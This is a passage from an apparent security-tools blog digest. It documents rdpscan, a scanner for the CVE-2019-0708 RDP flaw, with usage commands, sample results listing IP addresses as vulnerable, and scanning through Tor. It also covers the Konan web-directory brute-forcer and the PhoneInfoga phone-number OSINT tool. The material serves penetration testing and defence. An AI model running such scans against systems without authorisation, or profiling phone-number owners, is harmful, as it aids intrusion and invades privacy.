of specifying targets on the command-line, you can load them from a file instead, using the well-named –file parameter:./rdpscan –file ips.txtThe format of the file is one address, name, or range per line. It can also consume the text generated by masscan. Extra whitespace is trimmed, blank lines ignored, any any comment lines are ignored. A comment is a line starting with the # character, or // characters.The output is sent to stdout giving the status of VULNERABLE, SAFE, or UNKNOWN. There could be additional reasons for each. These reasons are described above. – SAFE – CredSSP/NLA required185.11.124.79 – SAFE – not RDP – SSH response seen125.121.137.42 – UNKNOWN – no connection – refused (RST) – SAFE – CredSSP/NLA required121.204.186.182 – SAFE – CredSSP/NLA required99.8.11.148 – SAFE – CredSSP/NLA required121.204.186.114 – SAFE – CredSSP/NLA required49.50.145.236 – SAFE – CredSSP/NLA required106.12.74.155 – VULNERABLE – got appid222.84.253.26 – SAFE – CredSSP/NLA required144.35.133.109 – UNKNOWN – RDP protocol error – receive timeout199.212.226.196 – UNKNOWN – RDP protocol error – receive timeout183.134.58.152 – UNKNOWN – no connection – refused (RST) – VULNERABLE – got appidYou can process this with additional unix commands like grep and cut. To get a list of just vulnerable machines:./rdpscan | grep ‘VULN’ | cut -f1 -d’-‘The parameter -dddd means diagnostic information, where the more ds you add, the more details are printed. This is sent to stderr instead of stdout so that you can separate the streams. Using bash this is done like this:./rdpscan –file myips.txt -ddd 2> diag.txt 1> results.txtDiagnostic infoAdding the -d parameter dumps diagnostic info on the connections to stderr../rdpscan -d[+] []:3389 – connecting…[+] []:3389 – connected from []:49211[+] []:3389 – SSL connection[+] []:3389 – version = v4.8[+] []:3389 – Sending MS_T120 check packet[-] []:3389 – Max sends reached, waiting… – SAFE – Target appears patchedOn macOS/Linux, you can redirect stdout and stderr separately to different files in the usual manner:./rdpscan –file ips.txt 2> diag.txt 1> results.txtSOCKS5 and Tor lulzSo it includes SOCKS5 support:./rdpscan –file ips.txt –socks5 localhost –socks5port 9050It makes connection problems worse so you get a lot more "UNKNOWN" results.Statically link OpenSSLFor releasing the Windows and macOS binaries attached as releases to this project I statically link OpenSSL, so that it doesn’t need to be included separately, and the programs just work. This section describes some notes on how to do this, especially since the description on OpenSSL’s own page seems to be out of date.Both these steps start with downloading the OpenSSL source and putting it next to the rdpscan directory:git clone https://github.com/openssl/opensslWindowsFor Windows, you need to first install some version of Perl. I use the one from ActiveState.Next, you’ll need a special "assembler". I use the recommended one called NASM)Next, you’ll need a compiler. I use VisualStudio 2010. You can download the latest "Visual Studio Community Edition" (which is 2019) instead from Microsoft.Now you need to build the makefile. This is done by going into the OpenSSL directory and running the Configure Perl program:perl Configure VC-WIN32I chose 32-bit for Windows because there’s a lot of old Windows out there, and I want to make the program as compaitble as possible with old versions.I want a completely static build, including the C runtime. To do that, I opened the resulting makefile in an editor, and changed the C compilation flag from /MD (meaning use DLLs) to /MT. While I was there, I added the following to the CPPFLAGS -D_WIN32_WINNT=0x501, which restrict OpenSSL to features that work back on Windows XP and Server 2003. Otherwise, you get errors that bcrypt.dll was not found if your run on those older systems.Now you’ll need to make sure everything is in your path. I copied nasm.exe to the a directory in the PATH. For Visual Studio 2010, I ran the program vcvars32.bat to setup the path variables for the compiler.At this point on the command-line, I typed:nmakeThis makes the libraries. The static ones are libssl_static.lib and libcrypto_static.lib, which I use to link to in rdpscan.macOSFirst of all, you need to install a compiler. I use the Developer Tools from Apple, installing XCode and the compiler. I think you can use Homebrew to install gcc instead.Then go int othe source directory for OpenSSL and create a makefile:perl Configure darwin64-x86_64-ccNow simply make it:make dependmakeAt this point, it’s created both dynamic (.dylib) and static (.lib) libraries. I deleted the dynamic libraries so that it’ll catch the static ones by default.Now in rdpscan, just build the macOS makefile:make -f Makefile.macosThis will compile all the rdpscan source files, then link to the OpenSSL libraries in the directory ../openssl that you just built.This should produce a 3-megabyte exexeutable. If you instead only got a 200-kilobyte executable, then you made a mistake and linked to the dynamic libraries instead.Download Rdpscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/mCI0mRVoYKo/rdpscan-quick-scanner-for-cve-2019-0708.html

Konan – Advanced Web Application Dir Scanner

Konan is an advanced open source tool designed to brute force directories and files names on web/application servers.InstallationDownload Konan by cloning the Git repository:git clone https://github.com/m4ll0k/Konan.git konanInstall requirements with pipcd konan && pip install -r requirements.txtRun Konanpython konan.pySupport PlatformsLinuxWindowsMacOSXFeatures Features Konan dirsearch dirb gobuster MultiThreaded yes yes yes yes Multiple Extensions yes yes no no HTTP Proxy Support yes yes yes yes Reporting yes (text and json) yes (text and json) yes (text) no User-Agent randomization yes yes no no Ignore word in wordlist using regexp yes no no no Split extension in wordlist yes no no no Multiple Methods yes no no no Response Size Process yes no no no Provide Sub-Dir for Brute Force yes no no no Provide Dir for Recursively Brute Force yes no no no URL Injection Point yes no no no UsageBasic:python konan.py -u/–url http://example.com/URL: http://testphp.vulnweb.com/PERCENT – TIME – CODE – METHOD – LENGHT – URL——————————————————-0.39% – 01:32:50 – 200 – GET – 4958 – http://testphp.vulnweb.com/index.php 0.43% – 01:32:52 – 200 – GET – 4732 – http://testphp.vulnweb.com/search.php 0.54% – 01:32:57 – 200 – GET – 5523 – http://testphp.vulnweb.com/login.php 0.81% – 01:33:12 – 200 – GET – 4830 – http://testphp.vulnweb.com/logout.php 8.77% – 01:40:02 – 302 – GET – 14 – http://testphp.vulnweb.com/userinfo.php -> login.phpInjection Point:python konan.py -u/–url http://example.com/%%/index.phpURL: http://testphp.vulnweb.com/%%/index.phpPERCENT – TIME – CODE – METHOD – LENGHT – URL——————————————————-0.39% – 01:32:50 – 200 – GET – 4958 – http://testphp.vulnweb.com/test/index.php 0.43% – 01:32:52 – 200 – GET – 4732 – http://testphp.vulnweb.com/search/index.php python konan.py -u/–url http://example.com/test%% -w /root/numbers.txtURL: http://testphp.vulnweb.com/test%%PERCENT – TIME – CODE – METHOD – LENGHT – URL——————————————————-0.39% – 01:32:50 – 200 – GET – 4958 – http://testphp.vulnweb.com/test120.43% – 01:32:52 – 200 – GET – 4732 – http://testphp.vulnweb.com/test34 Provide wordlist, default /db/dict.txt:python konan.py -u/–url http://example.com/ -w/–wordlist /root/dict.txt Provide extensions with -f/–force option:python konan.py -u/–url http://example.com/ -e/–extension php,html -f/–forceURL: http://testphp.vulnweb.com/PERCENT – TIME – CODE – METHOD – LENGHT – URL——————————————————-0.39% – 02:00:21 – 200 – GET – 4958 – http://testphp.vulnweb.com/index.html 0.43% – 02:00:23 – 200 – GET – 4732 – http://testphp.vulnweb.com/search.php 0.54% – 02:00:30 – 200 – GET – 5523 – http://testphp.vulnweb.com/login.php 0.81% – 02:00:46 – 200 – GET – 4830 – http://testphp.vulnweb.com/logout.html 0.87% – 02:00:50 – 200 – GET – 6115 – http://testphp.vulnweb.com/categories.htmlProvide status code exclusion:python konan.py -u/–url http://example.com/ -x/–exclude 400,403,401Provide only status code for output:python konan.py -u/–url http://example.com/ -o/–only 200,301,302Wordlist lowercase (isATest -> isatest) and uppercase (isAtest -> ISATEST):python konan.py -u/–url http://example.com/ -w/–wordlist /root/dict.txt [-l/–lowercase OR -p/–uppercase]Wordlist split (test.php -> to -> test):python konan.py -u/–url http://example.com/ -w/–wordlist /root/dict.txt -s/–splitWordlist Ignore word,letters,number,..etc provided by regexp (\w*.php|\w*.html,^[0-9_-]+):_python konan.py -u/–url http://example.com/ -w/–wordlist -I/–ignore “\?+"Output without -I/–ignore options:URL: http://testphp.vulnweb.com/PERCENT – TIME – CODE – METHOD – LENGHT – URL——————————————————-0.39% – 02:06:31 – 200 – GET – 4958 – http://testphp.vulnweb.com/???.php 0.43% – 02:06:32 – 200 – GET – 4732 – http://testphp.vulnweb.com/??????????? 0.54% – 02:06:35 – 200 – GET – 5523 – http://testphp.vulnweb.com/admin/ Output with -I/–ignore (in this case \?+) options: URL: http://testphp.vulnweb.com/PERCENT – TIME – CODE – METHOD – LENGHT – URL——————————————————-0.54% – 02:06:35 – 200 – GET – 5523 – http://testphp.vulnweb.com/admin/ Recursive:_python konan.py -u/–url http://example.com/ -E/–recursiveRecursive directory found and directory provided by -D/–dir-rec:python konan.py -u/–url http://example.com/ -E/–recursive -D/–dir-rec "admin,tests,dev,internal"Brute Force directory provided by -S/–sub-dir:python konan.py -u/–url http://example.com/ -S/–sub-dir "admin,test,internal,dev"Multiple Methods (check GET,POST,PUT and DELETE for word entry):Note: Much web application if not make the request with right method return 404 code, this option test all methodspython konan.py -u/–url http://example.com/ -m/–methods"Content size process (show response if the response size is ">[number]","<[number]","=[number]"):python konan.py -u/--url http://example.com/ -C/--lenght "<1000"URL: http://testphp.vulnweb.com/PERCENT - TIME - CODE - METHOD - LENGHT - URL-------------------------------------------------------0.19% - 02:11:46 - 301 - GET - 184 - http://testphp.vulnweb.com/admin -> http://testphp.vulnweb.com/admin/1.73% – 02:12:37 – 301 – GET – 184 – http://testphp.vulnweb.com/images -> http://testphp.vulnweb.com/images/Download Konan

Link: http://feedproxy.google.com/~r/PentestTools/~3/00MhPW6Sun0/konan-advanced-web-application-dir.html

PhoneInfoga – Advanced Information Gathering & OSINT Tool For Phone Numbers

PhoneInfoga is one of the most advanced tools to scan phone numbers using only free resources. The goal is to first gather standard information such as country, area, carrier and line type on any international phone numbers with very good accuracy. Then search for footprints on search engines to try to find the VoIP provider or identify the owner.FeaturesCheck if phone number exists and is possibleGather standard information such as country, line type, and carrierOSINT footprinting using external APIs, Google Hacking, phone books & search enginesCheck for reputation reports, social media, disposable numbers and moreScan several numbers at onceUse custom formatting for more effective OSINT reconnaissanceAutomatic footprinting on several custom formatsDownload PhoneInfoga

Link: http://www.kitploit.com/2019/06/phoneinfoga-advanced-information.html